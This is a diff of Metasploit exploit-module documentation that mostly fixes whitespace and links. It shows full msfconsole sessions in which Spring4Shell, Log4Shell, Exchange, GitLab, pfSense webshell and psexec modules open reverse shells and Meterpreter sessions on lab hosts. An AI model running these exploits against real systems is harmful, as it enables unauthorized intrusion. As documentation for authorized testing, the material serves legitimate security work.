[*] Command Stager progress - 100.00% done (116/116 bytes)
[*] Server stopped.
meterpreter >
meterpreter >
```
### GitLab 13.10.2 on CentOS 8. Get reverse shell using printf / reverse_tcp
@ -252,10 +252,10 @@ msf6 exploit(multi/http/gitlab_exif_rce) > set LHOST 10.0.0.9
LHOST => 10.0.0.9
msf6 exploit(multi/http/gitlab_exif_rce) > exploit
[*] Started reverse TCP handler on 10.0.0.9:4444
[*] Started reverse TCP handler on 10.0.0.9:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Uploading NUvUyPiyKL3.jpg to /PT2hiCf47
[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. The error response indicates ExifTool was not run. "set ForceExploit true" to override check result.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/gitlab_exif_rce) >
msf6 exploit(multi/http/gitlab_exif_rce) >
```

8
documentation/modules/exploit/multi/http/spring_cloud_function_spel_injection.md
View File

@ -26,14 +26,14 @@ execution. Both patched and unpatched servers will respond with a 500 server err
### Spring Cloud Function v3.1.6 on Fedora 34
```
msf6 exploit(multi/http/spring_could_function_spel_injection) > show options
msf6 exploit(multi/http/spring_could_function_spel_injection) > show options
Module options (exploit/multi/http/spring_could_function_spel_injection):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.159.128 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RHOSTS 192.168.159.128 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 8080 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
@ -61,7 +61,7 @@ Exploit target:
msf6 exploit(multi/http/spring_could_function_spel_injection) > exploit
[*] Started reverse TCP handler on 192.168.250.134:4444
[*] Started reverse TCP handler on 192.168.250.134:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] Executing Unix Command for cmd/unix/python/meterpreter/reverse_tcp
@ -78,5 +78,5 @@ OS : Linux 5.16.14-100.fc34.x86_64 #1 SMP PREEMPT Fri Mar 11 20:24:
Architecture : x64
System Language : en_US
Meterpreter : python/linux
meterpreter >
meterpreter >
```

32
documentation/modules/exploit/multi/http/spring_framework_rce_spring4shell.md
View File

@ -1,11 +1,11 @@
## Vulnerable Application
Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions when running on JDK 9 or above
and specifically packaged as a traditional WAR and deployed in a standalone Tomcat instance are vulnerable
to remote code execution due to an unsafe data binding used to populate an object from request parameters
to set a Tomcat specific ClassLoader. By crafting a request to the application and referencing the
Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions when running on JDK 9 or above
and specifically packaged as a traditional WAR and deployed in a standalone Tomcat instance are vulnerable
to remote code execution due to an unsafe data binding used to populate an object from request parameters
to set a Tomcat specific ClassLoader. By crafting a request to the application and referencing the
org.apache.catalina.valves.AccessLogValve class through the classLoader with parameters such as the following:
class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp, an unauthenticated attacker can
class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp, an unauthenticated attacker can
gain remote code execution.
## Verification Steps
@ -36,9 +36,9 @@ The target is the [vulhub container](https://github.com/vulhub/vulhub/tree/maste
GET HTTP method.
```
msf6 > use exploit/multi/http/spring_framework_rce_spring4shell
msf6 > use exploit/multi/http/spring_framework_rce_spring4shell
[*] No payload configured, defaulting to generic/shell_reverse_tcp
msf6 exploit(multi/http/spring_framework_rce_spring4shell) > show options
msf6 exploit(multi/http/spring_framework_rce_spring4shell) > show options
Module options (exploit/multi/http/spring_framework_rce_spring4shell):
@ -47,7 +47,7 @@ Module options (exploit/multi/http/spring_framework_rce_spring4shell):
HTTP_METHOD Automatic no HTTP method to use (Accepted: Automatic, GET, POST)
PAYLOAD_PATH webapps/ROOT yes Path to write the payload
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 8080 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The path to the application action
@ -69,11 +69,11 @@ Exploit target:
0 Java
msf6 exploit(multi/http/spring_framework_rce_spring4shell) > set PAYLOAD java/jsp_shell_reverse_tcp
msf6 exploit(multi/http/spring_framework_rce_spring4shell) > set PAYLOAD java/jsp_shell_reverse_tcp
PAYLOAD => java/jsp_shell_reverse_tcp
msf6 exploit(multi/http/spring_framework_rce_spring4shell) > exploit http://192.168.159.128:8080/
[*] Started reverse TCP handler on 192.168.250.134:4444
[*] Started reverse TCP handler on 192.168.250.134:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[+] Automatically identified HTTP method: GET
@ -98,11 +98,11 @@ POST HTTP method.
```
msf6 > use exploit/multi/http/spring_framework_rce_spring4shell
[*] Using configured payload java/jsp_shell_reverse_tcp
msf6 exploit(multi/http/spring_framework_rce_spring4shell) > set TARGET Linux
msf6 exploit(multi/http/spring_framework_rce_spring4shell) > set TARGET Linux
TARGET => Linux
msf6 exploit(multi/http/spring_framework_rce_spring4shell) > set PAYLOAD linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/spring_framework_rce_spring4shell) > set PAYLOAD linux/x64/meterpreter/reverse_tcp
PAYLOAD => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/spring_framework_rce_spring4shell) > show options
msf6 exploit(multi/http/spring_framework_rce_spring4shell) > show options
Module options (exploit/multi/http/spring_framework_rce_spring4shell):
@ -111,7 +111,7 @@ Module options (exploit/multi/http/spring_framework_rce_spring4shell):
HTTP_METHOD Automatic no HTTP method to use (Accepted: Automatic, GET, POST)
PAYLOAD_PATH webapps/ROOT yes Path to write the payload
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 8080 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /app/example/HelloWorld.action yes The path to the application action
@ -135,7 +135,7 @@ Exploit target:
msf6 exploit(multi/http/spring_framework_rce_spring4shell) > exploit http://192.168.159.128:8085/helloworld/greeting
[*] Started reverse TCP handler on 192.168.250.134:4444
[*] Started reverse TCP handler on 192.168.250.134:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[+] Automatically identified HTTP method: POST
@ -158,5 +158,5 @@ OS : Debian 11.2 (Linux 5.17.4-100.fc34.x86_64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
meterpreter >
```

12
documentation/modules/exploit/multi/http/ubiquiti_unifi_log4shell.md
View File

@ -35,7 +35,7 @@ This uses jacobalberty/unifi:v6.5.53. Note that tags v6.5.54, v6.0.45, and v5.14
vulnerability. See [jacobalberty/unifi](https://hub.docker.com/r/jacobalberty/unifi) for more information.
```
msf6 > use exploit/multi/http/ubiquiti_unifi_log4shell
msf6 > use exploit/multi/http/ubiquiti_unifi_log4shell
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set TARGET Unix
TARGET => Unix
@ -51,7 +51,7 @@ msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set RPORT 8443
RPORT => 8443
msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > exploit
[*] Started reverse TCP handler on 192.168.250.134:4444
[*] Started reverse TCP handler on 192.168.250.134:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[+] Delivering the serialized Java object to execute the payload...
@ -83,7 +83,7 @@ msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set PAYLOAD windows/meterpre
PAYLOAD => windows/meterpreter/reverse_tcp
msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > exploit
[*] Started reverse TCP handler on 192.168.159.128:4444
[*] Started reverse TCP handler on 192.168.159.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[+] Delivering the serialized Java object to execute the payload...
@ -101,7 +101,7 @@ System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter >
meterpreter >
```
### UniFi Network Application v5.14.22 on OSX 11.2.3
@ -115,7 +115,7 @@ Module options (exploit/multi/http/ubiquiti_unifi_log4shell):
---- --------------- -------- -----------
LDIF_FILE no Directory LDIF file path
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 111.111.1.11 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RHOSTS 111.111.1.11 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 8443 yes The target port (TCP)
SRVHOST 222.222.2.222 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 389 yes The local port to listen on.
@ -141,7 +141,7 @@ Exploit target:
msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > run
[*] Started reverse TCP handler on 222.222.2.222:4444
[*] Started reverse TCP handler on 222.222.2.222:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[+] Delivering the serialized Java object to execute the payload...

16
documentation/modules/exploit/multi/misc/jboss_remoting_unified_invoker_rce.md
View File

@ -16,7 +16,7 @@ ENV JBOSS_HOME /opt/jboss/jboss-as-6.1
ENV EAP_HOME /opt/jboss/jboss-as-6.1
# Add the JBoss distribution to /opt, and make jboss the owner of the extracted zip content
# https://jbossas.jboss.org/downloads
# https://jbossas.jboss.org/downloads
RUN curl https://download.jboss.org/jbossas/6.1/jboss-as-distribution-6.1.0.Final.zip -o /opt/jboss/jboss-as-6.1.0.zip
RUN jar -xvf /opt/jboss/jboss-as-6.1.0.zip \
&& mv /opt/jboss/jboss-6.1.0.Final $EAP_HOME \
@ -44,12 +44,12 @@ services:
web:
build: .
ports:
- "8080:8080"
- "9990:9990"
- "4447:4447"
- "9999:9999"
- "4446:4446"
- "3873:3873"
- "8080:8080"
- "9990:9990"
- "4447:4447"
- "9999:9999"
- "4446:4446"
- "3873:3873"
- "4445:4445"
networks:
internet:
@ -89,7 +89,7 @@ Module options (exploit/multi/misc/jboss_remoting_unified_invoker_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS localhost yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RHOSTS localhost yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 4446 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.

16
documentation/modules/exploit/multi/misc/msf_rpc_console.md
View File

@ -18,7 +18,7 @@
Source and Installers:
* [Source Code Repository](https://github.com/rapid7/metasploit-framework)
* [Installers](https://github.com/rapid7/metasploit-framework/wiki/Downloads-by-Version)
* [Installers](https://docs.metasploit.com/docs/development/maintainers/downloads-by-version.html)
## Verification Steps
@ -49,7 +49,7 @@
### Ruby Target
```
msf > use exploit/multi/misc/msf_rpc_console
msf > use exploit/multi/misc/msf_rpc_console
msf exploit(msf_rpc_console) > set rhost 172.16.191.166
rhost => 172.16.191.166
msf exploit(msf_rpc_console) > set username msf
@ -62,7 +62,7 @@
target => 0
msf exploit(msf_rpc_console) > run
[*] Started reverse TCP handler on 172.16.191.181:4444
[*] Started reverse TCP handler on 172.16.191.181:4444
[+] 172.16.191.166:55552 - Authenticated successfully
[*] 172.16.191.166:55552 - Metasploit 4.14.28-dev
[*] 172.16.191.166:55552 - Ruby 2.3.3 x64-mingw32 2016-11-21
@ -78,7 +78,7 @@
### Windows CMD Target
```
msf > use exploit/multi/misc/msf_rpc_console
msf > use exploit/multi/misc/msf_rpc_console
msf exploit(msf_rpc_console) > set rhost 172.16.191.166
rhost => 172.16.191.166
msf exploit(msf_rpc_console) > set username msf
@ -89,11 +89,11 @@
lhost => 172.16.191.181
msf exploit(msf_rpc_console) > set target 0
target => 1
msf exploit(msf_rpc_console) > set payload cmd/windows/powershell_reverse_tcp
msf exploit(msf_rpc_console) > set payload cmd/windows/powershell_reverse_tcp
payload => cmd/windows/powershell_reverse_tcp
msf exploit(msf_rpc_console) > run
[*] Started reverse SSL handler on 172.16.191.181:4444
[*] Started reverse SSL handler on 172.16.191.181:4444
[+] 172.16.191.166:55552 - Authenticated successfully
[*] 172.16.191.166:55552 - Metasploit 4.14.28-dev
[*] 172.16.191.166:55552 - Ruby 2.3.3 x64-mingw32 2016-11-21
@ -112,7 +112,7 @@
### Unix CMD Target
```
msf > use exploit/multi/misc/msf_rpc_console
msf > use exploit/multi/misc/msf_rpc_console
msf exploit(msf_rpc_console) > set rhost 172.16.191.215
rhost => 172.16.191.215
msf exploit(msf_rpc_console) > set username msf
@ -127,7 +127,7 @@
payload => cmd/unix/reverse_python
msf exploit(msf_rpc_console) > run
[*] Started reverse TCP handler on 172.16.191.181:4444
[*] Started reverse TCP handler on 172.16.191.181:4444
[+] 172.16.191.215:55552 - Authenticated successfully
[*] 172.16.191.215:55552 - Metasploit 4.15.0-dev-aceeedc
[*] 172.16.191.215:55552 - Ruby 2.3.0 x86_64-linux 2015-12-25

2
documentation/modules/exploit/multi/misc/msfd_rce_remote.md
View File

@ -21,7 +21,7 @@ been performed on the following targets:
Source code and installers:
* [Source Code Repository](https://github.com/rapid7/metasploit-framework)
* [Installers](https://github.com/rapid7/metasploit-framework/wiki/Downloads-by-Version)
* [Installers](https://docs.metasploit.com/docs/development/maintainers/downloads-by-version.html)
## Verification Steps

12
documentation/modules/exploit/multi/veritas/beagent_sha_auth_rce.md
View File

@ -61,13 +61,13 @@ msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set rhosts 172.16.180.141
rhosts => 172.16.180.141
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set lhost 172.16.180.248
lhost => 172.16.180.248
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > show options
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > show options
Module options (exploit/multi/veritas/beagent_sha_auth_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 172.16.180.141 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RHOSTS 172.16.180.141 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 10000 yes The target port (TCP)
@ -97,7 +97,7 @@ msf6 exploit(multi/veritas/beagent_sha_auth_rce) > check
[*] 172.16.180.141:10000 - The target appears to be vulnerable. SHA authentication is enabled
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > run
[*] Started reverse TCP handler on 172.16.180.248:4444
[*] Started reverse TCP handler on 172.16.180.248:4444
[*] 172.16.180.141:10000 - Running automatic check ("set AutoCheck false" to disable)
[*] 172.16.180.141:10000 - Checking vulnerability
[*] 172.16.180.141:10000 - Connecting to BE Agent service
@ -123,7 +123,7 @@ System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter >
meterpreter >
```
## Options
@ -259,7 +259,7 @@ msf6 exploit(multi/veritas/beagent_sha_auth_rce) > check
[*] 172.16.180.135:10000 - The target is not exploitable. SHA authentication is disabled
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > run
[*] Started reverse TCP handler on 172.16.180.248:4444
[*] Started reverse TCP handler on 172.16.180.248:4444
[*] 172.16.180.135:10000 - Running automatic check ("set AutoCheck false" to disable)
[*] 172.16.180.135:10000 - Checking vulnerability
[*] 172.16.180.135:10000 - Connecting to BE Agent service
@ -268,5 +268,5 @@ msf6 exploit(multi/veritas/beagent_sha_auth_rce) > run
[*] 172.16.180.135:10000 - BE agent revision: 9.4
[-] 172.16.180.135:10000 - Exploit aborted due to failure: not-vulnerable: The target is not exploitable. SHA authentication is disabled "set ForceExploit true" to override check result.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/veritas/beagent_sha_auth_rce) >
msf6 exploit(multi/veritas/beagent_sha_auth_rce) >
```

8
documentation/modules/exploit/unix/http/pfsense_pfblockerng_webshell.md
View File

@ -70,7 +70,7 @@ Module options (exploit/unix/http/pfsense_pfblockerng_webshell):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 172.23.40.111 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RHOSTS 172.23.40.111 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 443 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to
listen on all addresses.
@ -101,7 +101,7 @@ Exploit target:
msf6 exploit(unix/http/pfsense_pfblockerng_webshell) > run
[*] Started reverse TCP handler on 172.23.47.143:4453
[*] Started reverse TCP handler on 172.23.47.143:4453
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Uploading shell...
[*] Webshell name is: zFOOjmPXX.php
@ -132,7 +132,7 @@ Module options (exploit/unix/http/pfsense_pfblockerng_webshell):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 172.23.40.111 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RHOSTS 172.23.40.111 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 443 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to
listen on all addresses.
@ -162,7 +162,7 @@ Exploit target:
msf6 exploit(unix/http/pfsense_pfblockerng_webshell) > run
[*] Started reverse double SSL handler on 172.23.47.143:4545
[*] Started reverse double SSL handler on 172.23.47.143:4545
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Uploading shell...
[*] Webshell name is: jIuhcpoe.php

4
documentation/modules/exploit/unix/http/syncovery_linux_rce_2022_36534.md
View File

@ -66,7 +66,7 @@ Module options (exploit/unix/http/syncovery_linux_rce_2022_36534):
---- --------------- -------- -----------
PASSWORD pass yes The password to Syncovery (default: pass)
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.178.26 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RHOSTS 192.168.178.26 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 8999 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The path to Syncovery
@ -94,7 +94,7 @@ msf6 exploit(unix/http/syncovery_linux_rce_2022_36534) > check
[+] 192.168.178.26:8999 - The target is vulnerable.
msf6 exploit(unix/http/syncovery_linux_rce_2022_36534) > run
[*] Started reverse TCP handler on 192.168.178.26:4444
[*] Started reverse TCP handler on 192.168.178.26:4444
[+] 192.168.178.26:8999 - Exploit successfully executed
[*] Sending stage (40132 bytes) to 192.168.178.26
[*] Meterpreter session 1 opened (192.168.178.26:4444 -> 192.168.178.26:38008) at 2022-09-06 13:44:13 +0200

28
documentation/modules/exploit/windows/http/exchange_chainedserializationbinder_rce.md
View File

@ -18,7 +18,7 @@ Tested against Exchange Server 2019 CU11 SU0 on Windows Server 2019, and Exchang
2016.
#### CVE-2022-23277 (Type Spoof Bypass)
Due to `ChainedSerializationBinder.BindToType(string, string)` and `ObjectReader.FastBindToType(string, string)` using
Due to `ChainedSerializationBinder.BindToType(string, string)` and `ObjectReader.FastBindToType(string, string)` using
different algorithms, it is possible to bypass validation checks and load a malicious object.
Tested against Exchange Server 2019 CU11 SU3, build 15.2.986.15 via [KB5008631].
@ -79,7 +79,7 @@ Set this to the OWA password. This can also be set to the password for a domain
### Exchange Server 2016 CU22 (Build 15.1.2375.7) on Windows Server 2016 x64 (CVE-2021-42321)
```
msf6 > use exploit/windows/http/exchange_chainedserializationbinder_rce
msf6 > use exploit/windows/http/exchange_chainedserializationbinder_rce
[*] No payload configured, defaulting to cmd/windows/powershell/meterpreter/reverse_tcp
msf6 exploit(windows/http/exchange_chainedserializationbinder_rce) > set HttpUsername aliddle
HttpUsername => aliddle
@ -89,7 +89,7 @@ msf6 exploit(windows/http/exchange_chainedserializationbinder_rce) > set DOMAIN
DOMAIN => EXCHG
msf6 exploit(windows/http/exchange_chainedserializationbinder_rce) > set RHOSTS 192.168.159.42
RHOSTS => 192.168.159.42
msf6 exploit(windows/http/exchange_chainedserializationbinder_rce) > show options
msf6 exploit(windows/http/exchange_chainedserializationbinder_rce) > show options
Module options (exploit/windows/http/exchange_chainedserializationbinder_rce):
@ -98,7 +98,7 @@ Module options (exploit/windows/http/exchange_chainedserializationbinder_rce):
HttpPassword Password1 yes The password to use to authenticate to the Exchange server
HttpUsername aliddle yes The username to log into the Exchange server as
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.159.42 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RHOSTS 192.168.159.42 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 443 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
@ -127,7 +127,7 @@ Exploit target:
msf6 exploit(windows/http/exchange_chainedserializationbinder_rce) > exploit
[*] Started reverse TCP handler on 192.168.250.134:4444
[*] Started reverse TCP handler on 192.168.250.134:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Target is an Exchange Server!
[+] The target appears to be vulnerable. Exchange Server 15.1.2375.7 is vulnerable to CVE-2021-42321
@ -159,7 +159,7 @@ meterpreter >
### Exchange Server 2016 CU22 Jan22SU (Build 15.1.2375.18) on Windows Server 2016 x64 (CVE-2022-23277)
```
msf6 > use exploit/windows/http/exchange_chainedserializationbinder_rce
msf6 > use exploit/windows/http/exchange_chainedserializationbinder_rce
[*] No payload configured, defaulting to cmd/windows/powershell/meterpreter/reverse_tcp
msf6 exploit(windows/http/exchange_chainedserializationbinder_rce) > set HttpUsername aliddle
HttpUsername => aliddle
@ -169,7 +169,7 @@ msf6 exploit(windows/http/exchange_chainedserializationbinder_rce) > set DOMAIN
DOMAIN => EXCHG
msf6 exploit(windows/http/exchange_chainedserializationbinder_rce) > set RHOSTS 192.168.159.42
RHOSTS => 192.168.159.42
msf6 exploit(windows/http/exchange_chainedserializationbinder_rce) > show options
msf6 exploit(windows/http/exchange_chainedserializationbinder_rce) > show options
Module options (exploit/windows/http/exchange_chainedserializationbinder_rce):
@ -178,7 +178,7 @@ Module options (exploit/windows/http/exchange_chainedserializationbinder_rce):
HttpPassword Password1 yes The password to use to authenticate to the Exchange server
HttpUsername aliddle yes The username to log into the Exchange server as
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.159.42 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RHOSTS 192.168.159.42 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 443 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
@ -207,7 +207,7 @@ Exploit target:
msf6 exploit(windows/http/exchange_chainedserializationbinder_rce) > exploit
[*] Started reverse TCP handler on 192.168.250.134:4444
[*] Started reverse TCP handler on 192.168.250.134:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Target is an Exchange Server!
[+] The target appears to be vulnerable. Exchange Server 15.1.2375.18 is vulnerable to CVE-2022-23277
@ -238,7 +238,7 @@ meterpreter >
### Exchange Server 2019 CU11 Jan22SU (Build 15.2.986.15) on Windows Server 2019 x64 (CVE-2022-23277)
```
msf6 > use exploit/windows/http/exchange_chainedserializationbinder_rce
msf6 > use exploit/windows/http/exchange_chainedserializationbinder_rce
[*] No payload configured, defaulting to cmd/windows/powershell/meterpreter/reverse_tcp
msf6 exploit(windows/http/exchange_chainedserializationbinder_rce) > set RHOSTS 192.168.159.11
RHOSTS => 192.168.159.11
@ -248,7 +248,7 @@ msf6 exploit(windows/http/exchange_chainedserializationbinder_rce) > set HttpPas
HttpPassword => Password1!
msf6 exploit(windows/http/exchange_chainedserializationbinder_rce) > set DOMAIN MSFLAB.LOCAL
DOMAIN => MSFLAB.LOCAL
msf6 exploit(windows/http/exchange_chainedserializationbinder_rce) > show options
msf6 exploit(windows/http/exchange_chainedserializationbinder_rce) > show options
Module options (exploit/windows/http/exchange_chainedserializationbinder_rce):
@ -257,7 +257,7 @@ Module options (exploit/windows/http/exchange_chainedserializationbinder_rce):
HttpPassword Password1! yes The password to use to authenticate to the Exchange server
HttpUsername aliddle yes The username to log into the Exchange server as
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.159.11 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RHOSTS 192.168.159.11 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 443 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
@ -286,7 +286,7 @@ Exploit target:
msf6 exploit(windows/http/exchange_chainedserializationbinder_rce) > exploit
[*] Started reverse TCP handler on 192.168.250.134:4444
[*] Started reverse TCP handler on 192.168.250.134:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Target is an Exchange Server!
[+] The target appears to be vulnerable. Exchange Server 15.2.986.15 is vulnerable to CVE-2022-23277
@ -311,7 +311,7 @@ System Language : en_US
Domain : MSFLAB
Logged On Users : 9
Meterpreter : x86/windows
meterpreter >
meterpreter >
```
[KB5008631]: https://support.microsoft.com/en-gb/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-january-11-2022-kb5008631-2ee4d1f3-8341-4a4d-86be-4b73bc944f1b

2
documentation/modules/exploit/windows/http/manageengine_adselfservice_plus_cve_2021_40539.md
View File

@ -36,7 +36,7 @@ Module options (exploit/windows/http/manageengine_adselfservice_plus_cve_2021_40
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 8888 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.

2
documentation/modules/exploit/windows/http/manageengine_servicedesk_plus_cve_2021_44077.md
View File

@ -35,7 +35,7 @@ Module options (exploit/windows/http/manageengine_servicedesk_plus_cve_2021_4407
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 8080 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Base path

2
documentation/modules/exploit/windows/smb/ms17_010_psexec.md
View File

@ -80,7 +80,7 @@ This approach is generally reliable, but has a high chance of getting caught by
**MOF Upload Target**
The [MOF](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-WbemExec-for-a-write-privilege-attack-on-Windows) target technically does not use psexec; it does not explicitly tell Windows to execute anything. All it does is upload two files: the payload (exe) in SYSTEM32 and a managed object
The [MOF](https://docs.metasploit.com/docs/development/developing-modules/libraries/how-to-use-wbemexec-for-a-write-privilege-attack-on-windows.html) target technically does not use psexec; it does not explicitly tell Windows to execute anything. All it does is upload two files: the payload (exe) in SYSTEM32 and a managed object
format file in SYSTEM32\wbem\mof\ directory. When Windows sees the MOF file in that directory, it automatically runs it. Once executed, the code inside the MOF file basically tells Windows to execute our payload in SYSTEM32, and you get a session.
Although it's a neat trick, Metasploit's MOF library only works against Windows XP and Windows Server 2003. And since it writes files to disk, there is also a high chance of getting

10
documentation/modules/exploit/windows/smb/psexec.md
View File

@ -34,7 +34,7 @@ msf exploit(psexec) > set SMBPass goodpass
SMBPass => goodpass
msf exploit(psexec) > exploit
[*] Started reverse TCP handler on 192.168.1.199:4444
[*] Started reverse TCP handler on 192.168.1.199:4444
[*] 192.168.1.80:445 - Connecting to the server...
[*] 192.168.1.80:445 - Authenticating to 192.168.1.80:445 as user 'Administrator'...
[*] 192.168.1.80:445 - Selecting native target
@ -45,7 +45,7 @@ msf exploit(psexec) > exploit
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1042) at 2016-03-01 16:51:56 -0600
meterpreter >
meterpreter >
```
## Options
@ -86,7 +86,7 @@ msf exploit(psexec) > set RHOST 192.168.1.80
RHOST => 192.168.1.80
msf exploit(psexec) > exploit
[*] Started reverse TCP handler on 192.168.1.199:4444
[*] Started reverse TCP handler on 192.168.1.199:4444
